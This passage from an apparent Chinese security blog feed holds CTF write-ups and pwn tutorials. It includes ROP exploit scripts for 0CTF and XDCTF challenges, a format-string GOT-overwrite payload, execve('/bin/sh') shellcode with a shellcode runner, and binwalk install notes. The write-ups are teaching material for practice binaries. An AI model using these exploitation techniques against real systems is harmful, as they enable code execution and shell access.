    payload3 += p64(0) # rbx
    payload3 += p64(1) # rbp
    payload3 += p64(0x00601040) # r12 syscall
    payload3 += p64(0x7) # r13 0x1+0x2+0x4 rwx
    payload3 += p64(0x1000) # r14 size
    payload3 += p64(0x601000) # r15 addr
    payload3 += p64(0x00400A30) # mov rdx, r13; mov rsi, r14; mov rdx r15; call [r12 + rbx*8]
    payload3 += 'a'*8    # padding
    payload3 += p64(0) # rbx
    payload3 += p64(1) # rbp
    payload3 += p64(0x0601048) # r12
    payload3 += p64(0x200) # r13
    payload3 += p64(0x601100) # r14 bss
    payload3 += p64(0) # r15
    payload3 += p64(0x04009A7) # overflow again
    payload3 = payload3.ljust(0x100, '\x00')



    payload4 = 'a'*0xa # 修改rax


    payload5 = 'a'*0x20 + p64(1) #rbp=1
    payload5 += p64(0x00400A30)  # mov rdx, r13; mov rsi, r14; mov rdx r15; call [r12 + rbx*8]
    payload5 += 'a'*8*7    # padding
    payload5 += p64(0x601100) # ret to bss
    payload5 = payload5.ljust(0x100, '\x00')


    payload6 = shellcode
    payload6 = payload6.ljust(0x200, '\x00')


    payload = payload1 + payload2 + payload3 + payload4 + payload5 + payload6

    return payload


def main():
    #payload = guess_payload(0, 0, ord('f'))
    #log.info(repr(payload))
    #fp = open('out.data', 'wb')
    #fp.write(payload)
    #fp.close()
    fuckflag()



if __name__ == '__main__':
    main()

附录

附件： blackhole.zip

]]> ctf 0ctf-2018 pwn [XDCTF-2017] easyeasy /ctf/xdctf-2017/crypto/base64/ 分析

题目中给出了一个txt，内容如下：

bWFpbigpe2ludCBpLG5bXT17KCgoMSA8PDEpPDwgKDE8PDEpPDwoMTw8Cm==
ICAgICAgIDEpPDwoMTw8KDE+PjEpKSkrKCgxPDwxKTw8KDE8PDEpKSksKCgoMQp=
ICAgICAgIDw8ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAxKQq=
ICAgICAgIDw8ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoMQp=
ICAgICAgIDw8MSk8PCgxPDwxKTw8ICAgICAgICAgKDE8PDEpKS0oKDE8PDEpPDwoCr==
ICAgIAkxPDwxKTw8KDE8PDEpKSsgICAgICAgICgoMTw8MSk8PCgxPDwoMT4+Ch==
ICAgICAgIDEpKSkrKDE8PCgxPj4xKSkpICAgICAgICAgICAgICAgICAgICAgICAgLAq=
ICAgICAgICgoKDE8PDEpPDwoMTw8MSkgICAgICAgICAgICAgICAgICAgICAgICA8PAo=
ICAgICAgICgxPDwxKTw8KDE8PDEpKS0oKDEgPDwxKTw8KDE8PDEpIDw8KDE8PCgxCl==
ICAgICAgID4+MSkpKS0oKDE8PDEpPDwoMTw8KDE+PjEpKSkpLCgoKDE8PDEpCp==
ICAgICAgIDw8KCAgICAxPDwgICAgICAgICAgICAgICAgICAgICAgICAgIDEpCt==
ICAgICAgIDw8KCAgICAxPDwgICAgICAgICAgICAgICAgICAgICAgICAgIDEpCu==
ICAgICAgIDw8KCAxPDwxKSktKCgxIDw8MSk8PCAoMSA8PDEpPDwoMSA8PAr=
ICAgICAgICgxPj4xKSkpLSgoMTw8MSk8PCgxPDwoMT4+MSkpKSksKCgoMTw8MSk8PAo=
ICAgICAgICgxPDwxKTw8KDE8PDEpPDwoMTw8MSkpLSgoMTw8MSk8PCgxPDwxKTw8KAr=
ICAgICAgIDE8PCgxPj4xKSkpLSgxPDwoMT4+ICAgICAgICAgIDEpKSksKCgoMTw8MSk8PAq=
ICAgICAgICgxPDwxKTw8KDE8PDEpKSsgICAgKCgxPDwxKSAgICA8PCgxPDwxKTw8Ch==
ICAgICAgICgxPDwoMT4+MSkpKS0oKCAgICAgMTw8MSk8PCggICAgICAxPDwoMT4+Co==
ICAgICAgIDEpKSkpLCgoMTw8MSk8PCAgICAgICgxPDwxKSAgICAgICAgPDwoMTw8MSkpCl==
ICAgICAgICwoKCgxPDwxKTw8KDE8PCAgICAgIDEpPDwoICAgICAgIDE8PDEpPDwoMTw8MSkpLQr=
ICAgICAgICgoMTw8MSk8PCgxPDwxKSAgICAgKS0oMTw8KDE+PjEpICAgICAgKSksKCgoCj==
ICAgICAgIDE8PDEpPDwoMTw8MSk8PCggICAgMTw8MSk8PCgxPDwxKSktICAgICgoMQp=
ICAgICAgIDw8ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMQq=
ICAgICAgICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8PAp=
ICAgICAgICgxPDwxKTw8KDE8PCgxPj4xKSkpLSgxPDwoMT4+MSkpKSwgKCgoMTw8MQp=
ICAgICAgICk8PCgxPDwxKTw8KDE8PDEpPDwoMTw8MSkpLSgoMTw8MSk8PCAoMSAgCk==
ICAgICAgIDw8ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAxCp==
ICAgICAgICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDw8Cn==
ICAgICAgICggICAgIDE8PCgxPj4xKSkpKyAgICAoMTw8MSkpLCgoKDEgICAgIDw8Cj==
ICAgICAgIDEpICAgIDw8KDE8PDEpPDwgICAgICAoMTw8MSk8PCgxICAgICAgIDw8Ck==
ICAgICAgIDEgICAgICkpLSgoMTw8MSk8PCAgICAoMTw8MSk8PCgxICAgICAgIDw8Cj==
ICAgICAgICggICAgIDE+PjEpKSktKCgxICAgICAgPDwxKTw8KDE8PCAgICAgICAoCj==
ICAgICAgIDEgICAgID4+MSkpKSksKCgoMSAgICAgPDwxKTw8KDEgICAgICAgIDw8Cg==
ICAgICAgIDEgICAgICk8PCgxPDwxKTw8KCAgICAgMTw8MSkpLSgoMSAgICAgIDw8Cm==
ICAgICAgIDEgICAgICk8PCgxPDwxKTw8ICAgICAoMTw8MSkpKygoICAgICAgICAxCv==
ICAgICAgIDw8MSk8PCgxPDwoMT4+MSkpKSksKCgoMTw8MSk8PCgxPDwxKSA8PCgxCm==
ICAgICAgIDw8MSkpKygxPDwoMT4+MSkpKSwoKCgxPDwxKTw8KDE8PDEpKSArKCgxCs==
ICAgICAgIDw8MSk8PCAoMTw8KDE+PjEpKSkgKyAoMTw8ICgxPj4xKSkpfSA7Zm9yCn==
ICAgICAgIChpPSgxPj4xKTtpPCgoKDE8PDEpPDwoMSA8PDEpKSsoKDEgPDwxKTw8KAr=
ICAgICAgIDE8PCgxPj4xKSkpKygxPDwxKSk7aSsrKSAgcHJpbnRmKCIlYyIsbltpXSk7fQp=

很显然里面是很多行base64，由于base64本身可以编码换行符，一般没必要编码成这样，所以考虑这是个base64隐写题，使用脚本一跑即可得到flag

附录

base64隐写: base64详解

]]> ctf xdctf-2017 crypto [XDCTF-2017] easyeasy /ctf/xdctf-2017/pwn/easyeasy/ 分析

拿到题目后F5，发现是个菜单题，并且给出了libc

linux下如何加载指定的so文件，可以见： Linux 加载动态链接库原理分析

先挑重点说吧

sub_400B4B

在这里 qword_6020D0 这个全局变量被分析出了奇怪的语法

奇怪的语法

考虑它是一个结构体一样的东西，根据F5手动创建一个结构体

结构体

创建后F5便正常了许多

在阅读源码后可以得知，在执行 sub_400985 时可以将 fun4 的最后一个byte重写，也就是说在

(*(void (**)(void))(*qword_6020D0)->fun4)();

可以执行到 0x400A**

在翻看汇编代码时发现，若是让其执行到 0x00400AAF ，则它在执行其内部的 0x400A35 时

会触发栈溢出，同时 0x400A35 并没有 canary ，简直完美的利用条件

溢出点

以这个图为例，可以构造如下rop链

0x7ffca4b29fb0 -> pop rdi;retn

0x7ffca4b29fb8 -> /bin/sh

0x7ffca4b29fc0 -> system

即可获取shell

pop rdi;retn 已经找到

也就是说，若是泄露了 libc 的地址，那么一切问题都解决了。

（然而智障的我被坑了好久

下面这句话是重点！

在初始化got表时，会调用libc中的某个函数，也就是说在初始化got表时，会在栈上残留一些指向libc的指针！

注：若是需要这样泄露libc地址时，千万不要乱nop函数，比如nop掉alarm函数，这样会导致栈信息的变化。同时这个操作极其依赖libc，最好能加载泄露的libc进行调试

在 sub_400A35 中，它写入数据时并没有在结尾加 ‘\0’ ，因此可以借它泄露信息。

在 0x0400AC4 下断点，查看此时的内存

stack

可以知道 0x7ffc07edc048 指向了该libc的 libc.bss(4176) 这个位置，这样一来就有了所有的信息

POC

下面为本题的 POC

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *

DEBUG = 0
LOCAL = 1
VERBOSE = 1

def call_byte(program, addr):
    program.sendline('4')
    program.sendline('1')
    # 32=0x20 恰好为最后一个函数指针的位置
    program.sendline('32')


    for i in range(3):
        program.sendline('4')
        program.sendline('4')

    program.recvuntil('Give me your luckynum:\n')

    program.sendline(str(addr))

def call(program, rbp, addr_list):
    call_byte(program, 0xAF) #call read
    payload = 'a' * 8 + p64(rbp)
    for addr in addr_list:
        payload += p64(addr)

    program.send(payload)

def get_libc_addr(program, libc):
    program.send('a' * 0x7 + '[')
    program.recvuntil('[')
    addr = u64(program.recv(6) + '\x00\x00') # _IO_stdfile_2_lock wtf????

    program.recvuntil('5. exit\n')
    program.sendline('1')
    program.sendline('10')
    program.sendline('plusls')
    program.recvuntil('Success!')
    program.recvuntil('5. exit\n')

    libc_addr = addr - libc.bss(4176)
    log.info('libc addr=' + hex(libc_addr))
    log.info('system addr=' + hex(libc_addr + libc.symbols['system']))

    return libc_addr

def main():
    if VERBOSE:
        context.log_level = 'debug'
    if LOCAL:
        program = process('./easyeasy')
    else:
        program = remote('117.34.105.149', 1251)
    if DEBUG:
        gdb.attach(program)

    libc = ELF('libc.so.6')
    libc_addr = get_libc_addr(program, libc)

    addr_list = [0x4010b3,libc_addr + list(libc.search('/bin/sh'))[0], libc_addr + libc.symbols['system']]


    call(program, u64('aaaaaaaa'), addr_list)

    program.interactive()

if __name__ == '__main__':
    main()

flag我也忘了

附录

附件： easyeasy.zip

包含idb文件以及题目

]]> ctf xdctf-2017 pwn [XDCTF-2017] destory /ctf/xdctf-2017/reverse/destory/ 分析

本题会对注册表进行修改，请自行nop掉该函数或者放到虚拟机运行

main函数

拿到题目拖进ida，发现main函数无法f5，提示这个地方不是个函数

不是函数

当手动创建函数时提示 **The function has undefined instruction/data at the specified address. **

创建失败

这是因为ida无法识别这个函数的开始和结束

这时只需要从main函数开始一直选中到retn，这时这片区域都变成了灰色

按下p后函数便创建成功了，此时main函数内部也从红色变成了黑色。

但是f5的结果却非常的奇怪

到汇编一看，是因为在 0x4015F5 附近加了花指令

0x4015F5

手动 undefined 这片区域，再手动 code 后便恢复了正常

asm

f5也可以正常识别

sub_401360

很明显，在这存在花指令，导致ida对其识别有些问题

花指令

考虑用 x32dbg随便打开一个程序，将 00401366 到 0040137F 的代码

E8 04 00 00 00 51 16 EB 0F 58 EB 03 5B 89 33 83 C0 02 EB 01 91 50 C3 38 74 03

复制到其中

x32dbg

当你跟完后（或者可以不用动态调试直接用脑思考）会发现，显然它跳到了 0040137E

也就是说这个call以及下面的语句，等价于 jmp 0x0040137E ，修改一下即可

类似的花指令的去除将不再阐述。

去除后F5便正常了许多

注: 这一段花指令其实可以不用去除，作为教学内容提一嘴

sub_4013D0

这个函数F5又失败了，ida提示 positive sp value has benn found

这一般是由于堆栈不平衡引起的

发现还是花指令引起的，将这一段变为未定义，手动修复一下堆栈平衡

修复后即可成功F5

最后

逆向后由于flag格式为 XDCTF{ 可以通过如下脚本得到第一个 . 前的数字的前缀为 56451

s = "5D4A4759477D4C6836723437316E3B6E717A787E747F"
xdctf='XDCTF{'
for i in range(len(xdctf)):
    print(int(s[i*2:i*2 + 2], 16) - ord(xdctf[i]))

使用下面的代码即可计算出该数字为 56451243

for i in range(0, 10000):
    a2 = int('56451' + str(i))
    if a2 % 5 == 3 and a2 % 7 == 2 and a2 % 13 == 4:
        print(a2)

知道了数字后即可解出flag

s = "5D4A4759477D4C6836723437316E3B6E717A787E747F"
s1 = '56451243'
flag = ''
for i in range(len(s)//2):
    flag += chr(int(s[i*2:i*2 + 2], 16) - ord(s1[i % len(s1)]) + ord('0'))

flag为：XDCTF{He1l020l7klttys}

附录

附件： destory.zip

包含idb文件以及题目

]]> ctf xdctf-2017 reverse 格式化字符串漏洞 /technical/binary/pwn/format-string/ 一个坑爹的问题

这个问题与主题没太大关系，还是提一提吧

在ubuntu16.10后 gcc 编译时默认加上了参数-pie，也就是运行地址随机化，可以更好的抵挡攻击，防pwn，但是出题就比较坑爹了

只需要编译时加上参数-no-pie即可

格式化字符串简介

格式化字符串，是一些程序设计语言在格式化输出API函数中用于指定输出参数的格式与相对位置的字符串参数，例如C、C++等程序设计语言的printf类函数，其中的转换说明（conversion specification）用于把随后对应的0个或多个函数参数转换为相应的格式输出；格式化字符串中转换说明以外的其它字符原样输出。

以上摘自wiki:格式化字符串

为了格式化字符串，需要使用占位符用于指明输出的参数值如何格式化。

在c语言中的printf这一大类函数中（包括vprintf，sprintf等），使用%d,%c,%s等占位符对字符串进行格式化

然而，一些特殊的用法往往被人们忽略了

控制输出长度

%nx表示按16进制输出，不足n位的话在字符串前面补空格

%0nx表示按16进制输出，不足n位的话在字符串前面补空格

其它占位符同理
指定参数

%n$x表示把第n个参数按16进制输出

注：

a. 指定参数可以与控制输出长度结合使用，如%n$08x

b. 指定参数不影响正常的输出，若执行printf("%3$d.%d.%d.%d", 1, 2, 3);，则输出3.1.2.3

c.在x86下指定参数时printf认为每个参数的长度为4字节，所以在碰上long long这样8字节或者更多的参数时，指定参数可能会出错，需要具体情况具体分析
保存输出字符的个数

可使用%n保存输出字符的个数到变量中

printf("1234%n", &a)由于输出了4个字符，将4写入a

注:

a.可以与指定参数结合使用

b.后面的参数为变量的地址，而不是变量的本身（好像是废话）

漏洞原因

在c语言中，往往有输出字符串的场景，当输出一个字符串的一般写法为

printf("%s", str);

当一些程序员偷懒后就成为了

printf(str);

若是攻击者掌握了字符串，那么可以利用1中的特殊用法，对你的程序做一些奇怪的事情，从而pwn掉你的程序

利用

由1可知道，%n可以写入数据，%nc等用法可以控制输出字符的长度从而控制数据的数值，结合指定参数，便可以对4字节内存进行读写

下面以一个题为例来说明

题目源码以及elf文件在文末附件中

丢进ida后明显可以看到

read(0, &s, 0x3FFu);
puts("Haha, your input is:");
printf(&s);

明显的一个格式化字符串漏洞

又看到

void getflag()
{
    system("/bin/sh");
}

发现没有地方调用getflag，考虑修改got表将下面的strlen的函数地址改为getflag的地址（其实不给getflag函数也可以做到，先考虑简单情况）。

首先先查询str相当于printf的第几个参数

命令中输入

(python -c "print('aaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x')";)|./repeat

执行后结果为

result

a对应的16进制ascii码为61，由此可以看出第4个参数为str

执行下列语句

(python -c "print('aaaa.%4\$08x')";)|./repeat

结果为

shell

验证自己的语句为正确的

注:

在python中$需要使用\进行转义输出，应为\$
python3全体都是unicode，对于一些不可见字符的处理存在问题，故使用python进行操作

既然知道了位置，便可着手写poc了，本文将介绍2种方法

原始的计算法

打开终端，输入

readelf -r repeat | grep strlen

结果为

0804a01c  00000607 R386JUMP_SLOT   00000000   strlen@GLIBC_2.0

可以看出strlen在got表中的位置为 0x0804a01c

注:

readelf命令可以查看elf文件信息，-r表示显示可重定位段的信息
程序执行动态链接库的函数时，先跳转到plt表，然后跳转到got表

ida可以看到下图

asm

可以得知getflag的地址为 0x0804853b

接下来构造字符串更改strlen函数地址即可

输入如下命令

(python -c "print('\x1c\xa0\x04\x08\x1d\xa0\x04\x08\x1e\xa0\x04\x08%47c%4\$hhn%74c%5\$hhn%1919c%6\$hn')";cat) | ./repeat

即拿到shell

注:

%n写入4字节，%hn写入2字节，%hhn写入1字节
由于需要写入0x0804853b，数据过大，分成三次写入，分别写入0x3b， 0x85, 0x0804（否则会输出时间过长，甚至段错误）
后面的数值可以自己计算，写入0x3b就应该保证前面输出了0x3b个字符，由于前面已经输出了12个字符，剩下只需要再输出0x3b - 12 = 47个字符。在需要写入0x85时只需要再输出0x85 - 0x3b = 74个字符，下面的同理

使用pwntools

比较原始的方法

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
context.log_level = 'debug'

#初始化变量 获取数据
r_program = process('./repeat')
program = ELF('pwn8')
got_printf = program.got['printf']
program_getflag = program.symbols['getflag']

#构造shellcode 需要将地址分2次写入
shellcode = ''
shellcode += p32(got_printf)
shellcode += p32(got_printf + 2)
high4 = program_getflag / 0x10000
low4 = program_getflag % 0x10000
shellcode += '%' + str(low4 - 8) +'c%4$hn'
shellcode += '%' + str(0x10000 + high4 - low4) +'c%5$hn'

#发送shellcode
r_program.sendline(shellcode)
r_program.interactive()

附录

附件： pwn8.zip

]]> technical binary pwn Linux 加载动态链接库原理分析 /technical/binary/pwn/load-so/ 挖坑待填

从指定目录加载动态链接库

只需要设置 LD_LIBRARY_PATH 这个环境变量即可

若是希望后面的程序都优先从该目录加载，可以执行下面的命令

export LD_LIBRARY_PATH=/home/plusls/Desktop:$LD_LIBRARY_PATH

其中 /home/plusls/Desktop 为so文件所在的目录

注：这样设置后 pwntools 起的进程也会继承该环境变量，加载此libc

]]> technical binary pwn ret2_dl_runtime_resolve /technical/binary/pwn/ret2_dl_runtime_resolve/ 附录

ret2_dl_runtime_resolve: https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/advanced_rop/

]]> technical binary pwn shellcode /technical/binary/pwn/shellcode/ 在pwn的过程中常常需要通过自己写shellcode来获取shell，本文将介绍几种简单的shellcode
注：本文以x86为基础

调用系统函数

在开始写shellcode时，首先需要想到，我应该如何调用shell呢？

在写C语言中，通常我们需要调用

system("/bin/sh")

从而获得shell

在写汇编时，有时候并不需要这么做

linux

在使用linux时写汇编时完全不必再去libc寻找system函数，然后传递参数并且call system，只需要使用 系统调用

先看一段引自wiki的介绍

system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on.

简单来讲，系统调用就是其实就是调用函数，而这个调用和call又有所区别，它执行的代码不在你的程序中，而在系统的内核空间中。系统调用包含了 文件读写，运行程序，获取时间等 一系列和系统有关的函数。若是在写C语言时调用这些函数，生成的汇编代码往往是到libc等库中找到程序地址，传递参数，再call其地址，而系统调用并不需要如此的麻烦，只需要用系统中断以及结合寄存器进行传参

系统调用主要有以下内容

int 0x80 与 syscall

若是需要系统调用，只需要在汇编中加入一句： int 0x80 ，这将告诉CPU，现在要进行一次中断从用户态进入内核态（我也不知道这是啥），而 0x80 表示中断编号，意味着告诉内核 程序要进行系统调用

若是在 x64 下则应将 0x80 替换为 syscall

系统调用编号

在linux中存在着许多系统调用，为了区分请求的API，内核开发者给每个系统调用都分配了一个系统调用号，调用时需要将系统调用号储存在EAX寄存器中，例如要调用 sys_write ，其系统调用号为4，则需要

xxxxxxxx
;传递系统调用号 这样写比mov eax,0x4更短
xor eax,eax
mov al,0x4
int 0x80

传递参数

系统调用时传递参数通常有2种方式，在参数小于等于5个时使用，EBX，ECX，EDX，ESI，EDI这5个寄存器，若是参数大于5个，则需要为EBX提供一个存放参数的内存的地址，还是以sys_write为例子
查阅文档可以知道，其C函数声明为

ssize_t write(int fd, const void *buf, size_t count);

所以调用时的汇编代码为

;字符串'abc'入栈
push 0x636261
;传递字符串地址
mov ecx,esp
;标准输出为1
xor ebx,ebx
mov bl,0x1
;长度3
xor edx,edx
mov dl,0x3
;传递系统调用号
xor eax,eax
mov al,0x4
int 0x80

windows

这个我也不会，挖坑待填

确定参数地址

系统调用时传递参数往往需要使用内存地址，通常情况下程序都会开启alsr，显然参数的地址大多数情况下是动态的（除了全局变量），这时候需要利用一些汇编指令获得地址

push

在汇编中

push xxx

上面的代码意味着将 xxx 入栈，并且esp减4，并且push后esp正好对应xxx的内存地址，于是有如下方法

假设要向栈中放入 /bin/sh 字符串，并且将其地址赋给ebx

;/sh
push 0x68732f
;/bin
push 0x6e69622f
mov ebx,esp

这样以来ebx的值便是 /bin/sh 的地址了

call

在程序执行call时，会将下一条指令的地址入栈然后跳转到要执行的地方，若是程序在栈上执行，则可以利用call获得地址

注:call的字节码为 e8 ab cd ef gh ,其中 ghefcdab 是 要跳转到的地址 - call后执行的下一条指令的地址

还是以 /bin/sh 为例

\xe8\x08\x00\x00\x00/bin/sh\x00

注：我实在不知道该如何表达，这是下面的汇编指令的前面的字节码

pop ebx

shellcode

由前面的2种确定地址的方式，最终可以写出2种shellcode

注：在这里以linux为例子，这只是最简单的shellcode

使用push

注：本文用pwntools生成字节码

shellcode = asm(
'''
push 0x68732f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor eax,eax
mov al,0xb
int 0x80
'''
)

使用call

shellcode = '\xe8\x08\x00\x00\x00/bin/sh\x00'
shellcode += asm(
'''
pop ebx
xor eax,eax
xor ecx,ecx
mov al,0xb
int 0x80
'''
)

测试shellcode

在编写完成后，有时需要对shellcode进行一些测试，这时有多种方法

C写的shellcode测试器

源码直接给出，忘了从哪看到的了

#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <stdio.h>  
#include <sys/mman.h>  
#include <errno.h>  
#include <unistd.h>  
#include <stdlib.h>  
  
  
char code[4096] __attribute__((aligned(4096)));  
  
int main(int argc, const char *argv[])  
{  
    int fd;  
    int ret;  
    void (*func)(void);  
  
    if (argc != 2) {  
        fprintf(stderr, "\n\tUsage: sctest <shellcode>\n\n");  
        return 1;  
    }  
  
    fd = open(argv[1], O_RDONLY);  
    if (!fd) {  
        fprintf(stderr, "Unable open file %s, err = %d(%m)\n", argv[1], errno);  
        return 2;  
    }  
  
    ret = read(fd, code, sizeof(code));  
    if (ret < 0) {  
        fprintf(stderr, "Unable read file %s, err = %d(%m)\n", argv[1], errno);  
        return 3;  
    }  
  
    ret = mprotect(code, sizeof(code), PROT_EXEC);  
    if (ret < 0) {  
        fprintf(stderr, "Unable mprotect, err = %d(%m)\n", errno);  
        return 4;  
    }  
  
    /* execute shell code */  
    func = (void (*)(void))code;  
    func();  
    abort();      
}

pwntools

这个貌似只能测试linux下的

例：

>>> from pwn import *
>>> shellcode = asm(
... '''
... push 0x68732f
... push 0x6e69622f
... mov ebx,esp
... xor ecx,ecx
... xor eax,eax
... mov al,0xb
... int 0x80
... '''
... )
>>> p = run_shellcode(shellcode)
[*] '/tmp/pwn-asm-0KtoGK/step3-elf'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8049000)
    RWX:      Has RWX segments
[x] Starting local process '/tmp/pwn-asm-0KtoGK/step3-elf'
[+] Starting local process '/tmp/pwn-asm-0KtoGK/step3-elf': pid 60022
>>> p.sendline('pwd')
>>> print(p.recv())
/home/plusls

>>> p.sendline('exit')
>>> p.poll()
[*] Process '/tmp/pwn-asm-0KtoGK/step3-elf' stopped with exit code 0 (pid 60022)
0
>>>

run_assembly 同理，将参数换为汇编文本即可

以及run_shellcode_exitcode ，run_assembly_exitcode 可以等待 shellcode 执行完毕返回其返回值

更骚的操作

有时候一些漏洞会对输入进行过滤，此时需要对shellcode进行一些魔改

挖坑待填

最后

最后，便留个思考题吧，如何不用[](){}<>写一个输出Hello World的程序呢？
提示：编译时64位机器需要加上-m32

附录

x86系统调用查询：http://syscalls.kernelgrok.com/

x64系统调用查询：http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

]]> technical binary pwn 不用[](){}<>写一个Hello World程序 /technical/binary/pwn/write-helloworld-without-bracket/ 不用{}<>写一个Hello World程序，本方法基于gcc的编译器

C语言中的函数

在C语言中，一个函数其实可以看做一个变量，假设如今定义了如下函数

int fun()
{
    return 0;
}

则 &fun 将会像普通变量一样取得这个函数所在的地址

gcc下main函数调用机制

一个程序，其实并不是以main为开始，而是以start函数为开始

随便将一个ELF文件拖入ida可以看见

.text:00000000004006E0 _start          proc near               ; DATA XREF: LOAD:0000000000400018↑o
.text:00000000004006E0 ; __unwind {
.text:00000000004006E0                 xor     ebp, ebp
.text:00000000004006E2                 mov     r9, rdx         ; rtld_fini
.text:00000000004006E5                 pop     rsi             ; argc
.text:00000000004006E6                 mov     rdx, rsp        ; ubp_av
.text:00000000004006E9                 and     rsp, 0FFFFFFFFFFFFFFF0h
.text:00000000004006ED                 push    rax
.text:00000000004006EE                 push    rsp             ; stack_end
.text:00000000004006EF                 mov     r8, offset __libc_csu_fini ; fini
.text:00000000004006F6                 mov     rcx, offset __libc_csu_init ; init
.text:00000000004006FD                 mov     rdi, offset main ; main
.text:0000000000400704                 call    ___libc_start_main
.text:0000000000400709                 hlt
.text:0000000000400709 ; } // starts at 4006E0
.text:0000000000400709 _start          endp

在 .text:00000000004006FD 的位置，它将main这个变量的地址赋给rdi，即作为 ___libc_start_main 的第一个参数，随后该函数会调用main，即跳转到main这个变量上，执行上面的语句。

若是按照如下的方法编写代码

const char main[]="\x00\x01\x02\x03";

当执行 ___libc_start_main 后跳到main变量上时，就会执行 “\x00\x01\x02\x03” ，若是将汇编转为这个形式，则会执行这些汇编语句。同时，这样的语句有一种专业的叫法，叫shellcode。

注：之所以加const，首先这样可以防止\x00被编译器优化掉，其次是为了将这一段编译到 .rodata 段，这一个段默认是可以执行的。

但是为了通过这个题，还是需要更骚的操作，因为 [] 被禁用了。在gcc的实现中，相邻定义的变量，编译出来后，它们也是相邻的，所以上面的代码可以等价于

const char main=0x1, main1=0x1, main2=0x2, main3=0x3;

这样一来就可以完美的符合题意。

shellcode

详情见 shellcode

一键生成代码

下面的代码均基于pwntools

x32 linux

from pwn import *


def get_print_asm(s):
    s1 = asm('''
    xor eax, eax
    mov al, 0x4
    xor ebx, ebx
    mov bl, 0x1
    ''')
    s3 = asm ('''
    mov ecx, esp
    mov edx, %s
    int 0x80
    ''' % hex(len(s)))
    hex_list = []
    s2 = ''
    while len(s) >4:
        hex_list.append(u32(s[:4]))
        s = s[4:]
    s = s + '\x00' * (4 - len(s))
    hex_list.append(u32(s))
    hex_list.reverse()
    for each in hex_list:
        s2 += asm('push %s' % hex(each))
    s4 = asm('''
    xor eax, eax
    add esp, %s
    ret
    ''' % hex(len(hex_list) * 4))
    return s1 + s2 + s3 + s4

#def shellcode2c(shellcode):

def main():
    s = get_print_asm('Hello, World!')
    result = ''
    result += 'const char main=%s' % hex(ord(s[0]))
    for i in range(1, len(s)):
        result += ', main%d=%s' % (i, hex(ord(s[i])))
    result += ';'
    print result

if __name__ == '__main__':
    main()

x64 linux

from pwn import *
context.arch = 'amd64'


def get_print_asm(s):
    s1 = asm('''
    xor rax, rax
    mov al, 0x1
    xor rdi, rdi
    mov dil, 0x1
    ''')
    s3 = asm ('''
    mov rsi, rsp
    mov rdx, %s
    syscall
    ''' % hex(len(s)))
    hex_list = []
    s2 = ''
    while len(s) >8:
        hex_list.append(u64(s[:8]))
        s = s[8:]
    s = s + '\x00' * (8 - len(s))
    hex_list.append(u64(s))
    hex_list.reverse()
    for each in hex_list:
        s2 += asm('mov rbx, %s' % hex(each))
        s2 += asm('push rbx')
    s4 = asm('''
    xor rax, rax
    add rsp, %s
    ret
    ''' % hex(len(hex_list) * 8))
    return s1 + s2 + s3 + s4

#def shellcode2c(shellcode):

def main():
    s = get_print_asm('Hello, World!')
    result = ''
    result += 'const char main=%s' % hex(ord(s[0]))
    for i in range(1, len(s)):
        result += ', main%d=%s' % (i, hex(ord(s[i])))
    result += ';'
    print result

if __name__ == '__main__':
    main()

附录

]]> technical binary pwn 完整安装 binwalk /technical/binary/tools/install-binwalk/ 之前安装 binwalk 时都是 apt 一键安装, 后面使用时发现 apt 安装的 binwalk 会因为缺少一些命令行工具无法正常工作, 因此卸载掉了 apt 安装的 binwalk, 跟着官方文档手动安装 binwalk

然而官方文档都是基于 ubuntu 进行安装的, debian 下会缺少一些包。同时官方的依赖脚本也有些过时, 我根据自己机器的情况做了一些更改

我个人有一些强迫症, 不希望软件被装到 /usr/bin, 而是 ~/.local/bin, pip 安装时都加了 –user 参数

安装本体

pip 上的版本有点老旧, 这里直接从仓库安装

pip3 install git+https://github.com/ReFirmLabs/binwalk.git --user

crypto

pycrypto 已停止更新, 使用 pycryptodome

pip3 install pycryptodome --user

图片生成以及可视化

需要依赖 pyqtgraph 和 matplotlib

pip3 install matplotlib PyQt5 pyqtgraph --user

运行时报错

qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.

这是因为 libqxcb.so 找不到 libxkbcommon-x11.so.0, libxkbcommon-x11.so.0, 在 pyqt5 的更新日志中有提及

- [QTBUG-65503] Removed xkbcommon from bundled sources. This library is
  present on all supported platforms. The minimal required version now is
  0.5.0.

由于我是在 wsl 下安装的, 系统没有自带桌面环境, 是用 X11 转发到 vcxsrv 上是使用 GUI的, 因此没有带这个运行库

直接 apt 安装即可

sudo apt install libxkbcommon-x11-0

反汇编

binwalk 使用 capstone 进行反汇编

pip3 install capstone --user

安装提取工具

binwalk 运行时会依赖一些命令行工具用于提取固件

APT 一键安装的命令行工具

sudo apt install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord

软件包 cramfsprogs 包含命令 cramfsck, 在新版 ubuntu 和 debian 中已被移除, 我直接下载了旧版的包然后使用 dpkg 安装

wget http://mirrors.tuna.tsinghua.edu.cn/debian/pool/main/c/cramfs/cramfsprogs_1.1-6_amd64.deb
sudo dpkg -i cramfsprogs_1.1-6_amd64.deb
rm cramfsprogs_1.1-6_amd64.deb

安装 sasquatch

sasquatch 用于提取非标准的 SquashFS 镜像

编译时出现了同 #6 的报错, 这里使用了 @E3V3A 的解决方案, 使用 sed 修改了源码

sudo apt install build-essential liblzma-dev liblzo2-dev zlib1g-dev
git clone https://github.com/devttys0/sasquatch
cd sasquatch
wget https://downloads.sourceforge.net/project/squashfs/squashfs/squashfs4.3/squashfs4.3.tar.gz
